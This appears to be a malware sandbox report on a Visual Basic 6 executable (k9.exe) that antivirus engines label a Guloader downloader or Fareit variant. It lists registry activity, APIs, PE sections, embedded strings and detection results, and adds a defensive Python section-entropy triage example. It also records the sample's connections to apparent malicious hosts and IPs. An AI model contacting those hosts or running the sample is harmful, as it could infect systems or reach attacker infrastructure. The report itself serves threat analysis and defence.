HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl

Resolved APIs

kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.NlsGetCacheUpdateCount
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext

Executed commands

"C:\Users\Louise\AppData\Local\Temp\k9.exe"

PE Information

Image Base: 0x00400000
Entry Point: 0x004014f0
Reported Checksum: 0x0002884f
Actual Checksum: 0x0002884f
Minimum OS Version: 4.0
Compile Time: 2015-12-29 22:49:03
Import Hash: 4f89eae09cb20b0bd74b74cfe2ed0cce
Icon: (image not included in this extract)
Icon Exact Hash: 0ec54e18d6469565a9f555d4179fc6fb
Icon Similarity Hash: 7cedf82ed0ee9c8616d0d7f4d30c4da0

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x00016b2c 0x00017000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.71
.data 0x00018000 0x00018000 0x00000e58 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00019000 0x00019000 0x00001598 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.06
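
The Sections table above is produced by decoding each 40-byte IMAGE_SECTION_HEADER and measuring the Shannon entropy of the section's raw bytes; the .data entry with entropy 0.00 and 0x1000 bytes of raw data is a section that ships as zeros and is only populated at run time, while the .text value of 6.71 sits below the 7.0 that is commonly used as a packed-code threshold. The block below is an added example of that decoding and scoring, not the sandbox's code: the headers are packed from the table's own values, the section contents are constructed stand-ins (k9.exe's bytes are not on this page), and the 7.0 threshold and flag names are assumptions.

```python
"""Parse IMAGE_SECTION_HEADER records and score them the way the Sections
table above does (entropy per section plus the usual triage flags).  Added
example: the 40-byte headers are built here from the table's own values and
the section contents are constructed stand-ins, not bytes from k9.exe."""
import math
import struct

# IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    ent = -sum(c / n * math.log2(c / n) for c in counts if c)
    return ent if ent > 0 else 0.0


def parse_sections(blob, count):
    """Decode `count` consecutive section headers starting at blob[0]."""
    sections = []
    for i in range(count):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = \
            SECTION_HDR.unpack_from(blob, i * SECTION_HDR.size)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": rawsize, "raw_ptr": rawptr, "characteristics": chars,
        })
    return sections


def assess(section, raw):
    """Return (entropy rounded to 2 places, [flags]) for one section."""
    ent = shannon_entropy(raw)
    chars = section["characteristics"]
    flags = []
    if chars & IMAGE_SCN_CNT_CODE and ent > 7.0:     # assumed threshold
        flags.append("packed_code")            # code this dense is usually compressed/encrypted
    if ent == 0.0 and section["raw_size"] > 0:
        flags.append("constant_raw")           # every byte identical (zeros in the .data above)
    if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
        flags.append("writable_executable")
    if section["virtual_size"] > section["raw_size"]:
        flags.append("grows_in_memory")        # loader zero-fills the tail
    return round(ent, 2), flags


def build_header(name, vsize, vaddr, rawsize, rawptr, chars):
    """Pack one section header; used here only to construct the sample table."""
    return SECTION_HDR.pack(name.encode().ljust(8, b"\0"),
                            vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)


# Values copied from the Sections table above; characteristics are the
# IMAGE_SCN_* combinations it lists.
SAMPLE_TABLE = b"".join([
    build_header(".text", 0x16B2C, 0x1000, 0x17000, 0x1000, 0x60000020),
    build_header(".data", 0x00E58, 0x18000, 0x1000, 0x18000, 0xC0000040),
    build_header(".rsrc", 0x01598, 0x19000, 0x2000, 0x19000, 0x40000040),
])

# Constructed contents: every byte value equally often stands in for packed
# code, all zeros for .data, a repeating 8-byte pattern for .rsrc.
SAMPLE_CONTENTS = {
    ".text": bytes(range(256)) * (0x17000 // 256),
    ".data": bytes(0x1000),
    ".rsrc": b"RT_ICON\0" * (0x2000 // 8),
}


def triage(blob=SAMPLE_TABLE, contents=SAMPLE_CONTENTS):
    """Map section name -> (entropy, flags) for a header table and its data."""
    return {s["name"]: assess(s, contents[s["name"]])
            for s in parse_sections(blob, len(contents))}


if __name__ == "__main__":
    for name, (ent, flags) in triage().items():
        print(f"{name:<6} entropy={ent:.2f} flags={flags or '-'}")
```

On a real file the section contents come from the bytes at PointerToRawData for SizeOfRawData bytes; the header offset is found from the PE header's NumberOfSections and SizeOfOptionalHeader fields, which the table does not show and this example therefore does not parse.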

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_GROUP_ICON 0x000193b0 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00019150 0x00000260 LANG_CATALAN SUBLANG_DEFAULT 3.23 None

Imports (library MSVBVM60.DLL; entries shown as None are imported by ordinal, so no name is recorded)

0x401000 None
0x401004 _CIcos
0x401008 _adj_fptan
0x40100c __vbaVarMove
0x401010 None
0x401014 None
0x401018 __vbaFreeVar
0x40101c __vbaStrVarMove
0x401020 None
0x401024 __vbaLenBstr
0x401028 None
0x40102c __vbaFreeVarList
0x401030 _adj_fdiv_m64
0x401034 _adj_fprem1
0x401038 None
0x40103c None
0x401040 __vbaStrCat
0x401044 None
0x40104c __vbaLenBstrB
0x401050 None
0x401054 None
0x401058 _adj_fdiv_m32
0x40105c __vbaAryDestruct
0x401060 __vbaLateMemSt
0x401064 None
0x401068 None
0x40106c __vbaObjSet
0x401070 None
0x401074 _adj_fdiv_m16i
0x401078 __vbaObjSetAddref
0x40107c _adj_fdivr_m16i
0x401080 None
0x401084 None
0x401088 None
0x40108c __vbaFpR8
0x401090 _CIsin
0x401094 None
0x401098 None
0x40109c __vbaChkstk
0x4010a0 EVENT_SINK_AddRef
0x4010a8 __vbaStrCmp
0x4010ac __vbaVarTstEq
0x4010b0 __vbaAryConstruct2
0x4010b4 __vbaObjVar
0x4010b8 None
0x4010bc None
0x4010c0 _adj_fpatan
0x4010c4 None
0x4010c8 __vbaRedim
0x4010cc None
0x4010d0 EVENT_SINK_Release
0x4010d4 __vbaUI1I2
0x4010d8 _CIsqrt
0x4010e0 None
0x4010e4 __vbaExceptHandler
0x4010e8 None
0x4010ec _adj_fprem
0x4010f0 _adj_fdivr_m64
0x4010f4 __vbaFPException
0x4010f8 __vbaStrVarVal
0x4010fc None
0x401100 None
0x401104 _CIlog
0x401108 __vbaNew2
0x40110c _adj_fdiv_m32i
0x401110 _adj_fdivr_m32i
0x401114 __vbaStrCopy
0x401118 None
0x40111c __vbaI4Str
0x401120 None
0x401124 __vbaFreeStrList
0x401128 None
0x40112c None
0x401130 _adj_fdivr_m32
0x401134 _adj_fdiv_r
0x401138 None
0x40113c None
0x401140 None
0x401144 None
0x401148 __vbaInStrB
0x40114c None
0x401150 __vbaVarDup
0x401154 __vbaStrComp
0x401158 None
0x40115c __vbaLateMemCallLd
0x401160 None
0x401164 _CIatan
0x401168 __vbaStrMove
0x40116c None
0x401170 _allmul
0x401174 None
0x401178 _CItan
0x40117c None
0x401180 __vbaFPInt
0x401184 _CIexp
0x401188 __vbaFreeObj
0x40118c __vbaFreeStr
0x401190 None

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Raasyltesfoh1
Nanogram3
BABYMAJ
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
w/2z6
nCom
7Cn8v
Fw '
w '
tw ('
0'oou
/ti}F
o =/t
@'ooe
pnGmx
u2D
.:$/zQ
.:$/z}
f4!{K
w:d
y1x|k
a$4R]^
y1x|k
a$4R]^
y1x|k
tuwZoe
'on0v
"'ooT
UFC&$
!$<""
wG'/PW
nf4D_
0'oml
/" nT
7'o"#D6
f4a}F
f4xn5
^7Gt/
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
D951015=
%),//,)$
/96-*1H
$,698
MGB?>>ABFL
BABYMAJ
Kulegravningm
Option3
tidsregni
Option2
Efterskolers
Option1
Label1
Label1
Line2
Line1
VB5!6&*
apheticup
Raasyltesfoh1
Raasyltesfoh1
Raasyltesfoh1
Nanogram3
Reactivityso
mandskaberspl
advancei
Colicinetol
DISCIPLINARMI
Bucerotin4
Machinedpr8
Overd9
Unguentousudm
COCCOGONA
BEHOLDERNESS
tidsregni
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Label1
Kulegravningm
Efterskolers
Unalcoholizeds
GLYCOSINE
FLODHESTEN
Elektronrrs8
TROSKABSLFTET
__vbaStrComp
VBA6.DLL
__vbaStrVarVal
__vbaLenBstrB
__vbaI4Str
__vbaStrMove
__vbaLenBstr
__vbaFPInt
__vbaInStrB
__vbaAryDestruct
__vbaRedim
__vbaVarMove
__vbaStrCmp
__vbaGenerateBoundsError
__vbaFpR8
__vbaAryConstruct2
__vbaFreeStr
__vbaUI1I2
__vbaStrCopy
__vbaVarDup
__vbaFreeVar
__vbaVarTstEq
__vbaLateMemSt
__vbaFreeVarList
__vbaFreeStrList
__vbaStrCat
__vbaLateMemCallLd
__vbaObjVar
__vbaObjSetAddref
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
__vbaStrVarMove
Ijnefaldende4
UNCORRUPTEDNESS
hkeren
Valloners1
Rachiomyelitis5
Pickwicks6
sirdars
Skulptere2
tvesprogethed
sumeriskes
HUMANISATION
autostoppenes
termografi
SKILDPADDESUPPENS
SAMMENSYNINGENS
Aktivitetscenteret9
VIEVANDSKARRENE
Extroversive
FILAMENTERS
guvernantelitteraturens
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
_adj_fdiv_m64
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
__vbaLenBstrB
_adj_fdiv_m32
__vbaAryDestruct
__vbaLateMemSt
__vbaObjSet
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaStrCmp
__vbaVarTstEq
__vbaAryConstruct2
__vbaObjVar
_adj_fpatan
__vbaRedim
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaInStrB
__vbaVarDup
__vbaStrComp
__vbaLateMemCallLd
_CIatan
__vbaStrMove
_allmul
_CItan
__vbaFPInt
_CIexp
__vbaFreeObj
__vbaFreeStr
D951015=
%),//,)$
/96-*1H
$,698
MGB?>>ABFL
333333334
,/KPip
/-P?pR
Printningens1
Visible
RACERBILERS
OUTMAGIC
Pulsions
Whipsaws7
ABBEDIERNE
aurichloride
kaliumkloridets
Appendicalgia
temperaturfordelingernes
Originaldiskettes
POLITIFULDMGTIGES
MANUSSET
Vestmented
Broderingen2
TILSENDT
nonundergraduate
Nonplatitudinously
panini
Indkommet
Illative7
WALTHER
belton
Dockyardman
ROBERTAS
Genbrugsanlggets6
TARERINGERS
CENTERSKOLES
TRIADERS
UVEJRENE
scenarieformen
erfaringsvidenskabernes
billedlotteriets
Bioseston
Roudas6
polygenesis
DIDUCING
Sandworm
INADEPT
Workbag
Nautiloidean
dokumentationerne
dekametre
snitgrnts
outbullied
UPAAKLDTES
Fasterens
NDRINGSFLAG
ARYLS
goaltender
SVMMEPRVENS
SAMMENBUNKNINGER
Seedbed7
hebetation
SCOGGAN
Ugandan
Hjertefrekvenser7
Gipsdeponeringers
Primaveral1
Unsegregating
Cucurbite1
Treebine
SUPPOSABLE
Vidnesbyrd
Blodanalyse
angrebskrige
Electrochronometer3
Svarportoer1
Alternation
unclustered
DUMFOUNDING
Overholds
Tumblebug2
Billettere4
hstpanteretigheder
INBRING
mistendes
Spryer
BEAMWORK
CORRIGIBLE
Fivescore5
stvlendes
Draabers
Baadsmandsstoles
Srskrivningers4
DDSFJENDE
Opstarte7
skovturenes
laservison
afstemningstemaet
Tierlike2
Gungrendes7
Udladerens7
dollarkursens
PREPAINFUL
pakkelsning
NEBULISE
ORSON
ANGEKOK
HANNEN
MONOGRAPTUS
Prioritizing4
Fljlerne4
MENFRA
Feriebarns3
deliquescent
crested
spettle
Pegasusserne8
KRLIGHEDSSORG
Multivolume
centralstyre
Geonegative
FORLAGSPROTOKOLLERNES
Fortlletid
DIFFUSIMETER
Destillationernes7
Hjulbre
Varsovienne5
STIPITATE
ORIENTALISM
LABOURABILITY
hymettian
PADELION
grundlovs
MAALLS
ENERGITEKNOLOGIER
Antologia
scorpionfish
Friturekurve6
Udstraekning
Skeller
purvis
Atomforsgsstations2
Tsardmmer6
Unquailingly4
besynderlighedens
Appreciator
FAUVISM
Kartotekiseres
Ekstraordinrt
Morel2
NONPROHIBITORILY
arbejdspladser
Facons
Uretmssigt
Recepissers1
Kuglelejet
Illegalt
Grumps
Seismograms
FLETOPERATION
Talefilms
Snorkelyde8
FRESHLY
Tophi
hefter
DISKVALIFICERING
Relativization
VICARIOUSNESSES
Mejeriejer5
Absmho
KONSTITUERE
Bortgivelse4
PROTEKTIONISME
unlithographic
ROEDVINSTYPE
EPIBOLISM
Wienerbrdenes1
UNFLUORINATED
Erhvervsforsikringer2
PIFTS
Microsporidia5
initive
RESBEVISNINGERNES
MISSIONIZED
Cobego
Undigged3
subeditorial
Baglaas
CHIZZ
LOVEFUL
stereoplades
Skvts7
pantheress
Stormogulerne9
Foamless
HONEYS
Odontostomatous
knoben
CANNING
NGLEHUL
Drikkevisernes4
BOARFISH
Primrfilen5
Simial5
korrumpering
Bifer
Dimittender
Rhapsodize
TILSKD
Lrestnings
Unperforated1
Axoplasm
Skibshandler
SPACISTOR
CHEMOSORB
Marrying8
Skrhatten
Admiralsuniform3
steffensurternes
FAIRYLAND
kludetppernes
Randomizer9
Parthenogeny6
DATAANLAEG
Smaasvbene4
Halvftrene
Naig1
Skraakanter3
PERIFERIUDSTYRETS
Aarsgammel7
pyntegrnt
Tryllebindes3
UBESINDIGHEDER
Strygefries
DISHARMONISM
Snood
antistrike
VIKTUALIEFORRETNINGS
westralian
Overtakable
Datisi
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Raasyltesfoh1
FileVersion
ProductVersion
InternalName
apheticup
OriginalFilename
apheticup.exe
,/KPip
/-P?pR

Full Results

Engine: Signature (15 of 73 engines flagged the file)

Qihoo-360: HEUR/QVM03.0.B441.Malware.Gen
Cylance: Unsafe
Sangfor: Malware
APEX: Malicious
Kaspersky: UDS:DangerousObject.Multi.Generic
Paloalto: generic.ml
Trapmine: malicious.high.ml.score
SentinelOne: DFI - Suspicious PE
Endgame: malicious (high confidence)
ZoneAlarm: UDS:DangerousObject.Multi.Generic
McAfee: Fareit-FST!E90F65F7349E
ESET-NOD32: a variant of Win32/GenKryptik.ELXE
Rising: Downloader.Guloader!1.C738 (CLASSIC)
eGambit: Unsafe.AI_Score_80%
BitDefenderTheta: Gen:[email protected] (signature text garbled at extraction)

Clean (58 engines): Bkav, MicroWorld-eScan, CMC, CAT-QuickHeal, ALYac, Zillya, SUPERAntiSpyware, K7AntiVirus, Alibaba, K7GW, Cybereason, Arcabit, Invincea, Baidu, F-Prot, Symantec, TotalDefense, Avast, ClamAV, BitDefender, NANO-Antivirus, ViRobot, Tencent, Ad-Aware, Emsisoft, Comodo, F-Secure, DrWeb, VIPRE, TrendMicro, McAfee-GW-Edition, Fortinet, FireEye, Sophos, Cyren, Jiangmin, Webroot, Avira, MAX, Antiy-AVL, Kingsoft, Microsoft, AegisLab, Avast-Mobile, AhnLab-V3, Acronis, TACHYON, VBA32, Malwarebytes, Zoner, TrendMicro-HouseCall, Yandex, Ikarus, GData, AVG, Panda, CrowdStrike, MaxSecure

TCP

Source  Source Port  Destination (IP, plus hostname where resolved)  Destination Port
192.168.1.7 49174 13.107.42.23 443
192.168.1.7 49176 13.107.42.23 443
192.168.1.7 16978 188.165.53.185 www.esprit-de-connaisseur.com 30290
192.168.1.7 14421 188.165.53.185 www.esprit-de-connaisseur.com 18545
192.168.1.7 20037 188.165.53.185 www.esprit-de-connaisseur.com 22631
192.168.1.7 27727 188.165.53.185 www.esprit-de-connaisseur.com 30576
192.168.1.7 25189 188.165.53.185 www.esprit-de-connaisseur.com 12627
192.168.1.7 29741 188.165.53.185 www.esprit-de-connaisseur.com 20821
192.168.1.7 17745 188.165.53.185 www.esprit-de-connaisseur.com 29234
192.168.1.7 31350 188.165.53.185 www.esprit-de-connaisseur.com 28249
192.168.1.7 20550 188.165.53.185 www.esprit-de-connaisseur.com 13642
192.168.1.7 12881 188.165.53.185 www.esprit-de-connaisseur.com 27960
192.168.1.7 14186 188.165.53.185 www.esprit-de-connaisseur.com 29776
192.168.1.7 17510 188.165.53.185 www.esprit-de-connaisseur.com 19784
192.168.1.7 31050 188.165.53.185 www.esprit-de-connaisseur.com 19270
192.168.1.7 20831 188.165.53.185 www.esprit-de-connaisseur.com 26211
192.168.1.7 12342 188.165.53.185 www.esprit-de-connaisseur.com 19777
192.168.1.7 26180 188.165.53.185 www.esprit-de-connaisseur.com 31027
192.168.1.7 25418 188.165.53.185 www.esprit-de-connaisseur.com 17750
192.168.1.7 27734 188.165.53.185 www.esprit-de-connaisseur.com 20053
192.168.1.7 26934 188.165.53.185 www.esprit-de-connaisseur.com 29237
192.168.1.7 19766 188.165.53.185 www.esprit-de-connaisseur.com 23085
192.168.1.7 13648 188.165.53.185 www.esprit-de-connaisseur.com 10357
192.168.1.7 17509 188.165.53.185 www.esprit-de-connaisseur.com 18279
192.168.1.7 28246 188.165.53.185 www.esprit-de-connaisseur.com 30313
192.168.1.7 21079 188.165.53.185 www.esprit-de-connaisseur.com 18487
192.168.1.7 18531 188.165.53.185 www.esprit-de-connaisseur.com 32357
192.168.1.7 18543 188.165.53.185 www.esprit-de-connaisseur.com 18258
192.168.1.7 27212 188.165.53.185 www.esprit-de-connaisseur.com 13129
192.168.1.7 13625 188.165.53.185 www.esprit-de-connaisseur.com 13135
192.168.1.7 26223 188.165.53.185 www.esprit-de-connaisseur.com 26188
192.168.1.7 21068 188.165.53.185 www.esprit-de-connaisseur.com 14447
192.168.1.7 20784 188.165.53.185 www.esprit-de-connaisseur.com 23142
192.168.1.7 25951 188.165.53.185 www.esprit-de-connaisseur.com 18529
192.168.1.7 14183 188.165.53.185 www.esprit-de-connaisseur.com 20529
192.168.1.7 32326 188.165.53.185 www.esprit-de-connaisseur.com 29529
192.168.1.7 20551 188.165.53.185 www.esprit-de-connaisseur.com 18753
192.168.1.7 49195 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49196 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49189 23.20.239.12 www.parkwayautogroup.com 80
192.168.1.7 44973 52.114.133.61 7277
192.168.1.7 36807 52.114.133.61 63625
192.168.1.7 30029 63.250.37.110 www.vinoblay.com 12634
192.168.1.7 24954 63.250.37.110 www.vinoblay.com 17232
192.168.1.7 20566 63.250.37.110 www.vinoblay.com 18999
192.168.1.7 28264 63.250.37.110 www.vinoblay.com 28023
192.168.1.7 22131 63.250.37.110 www.vinoblay.com 17510
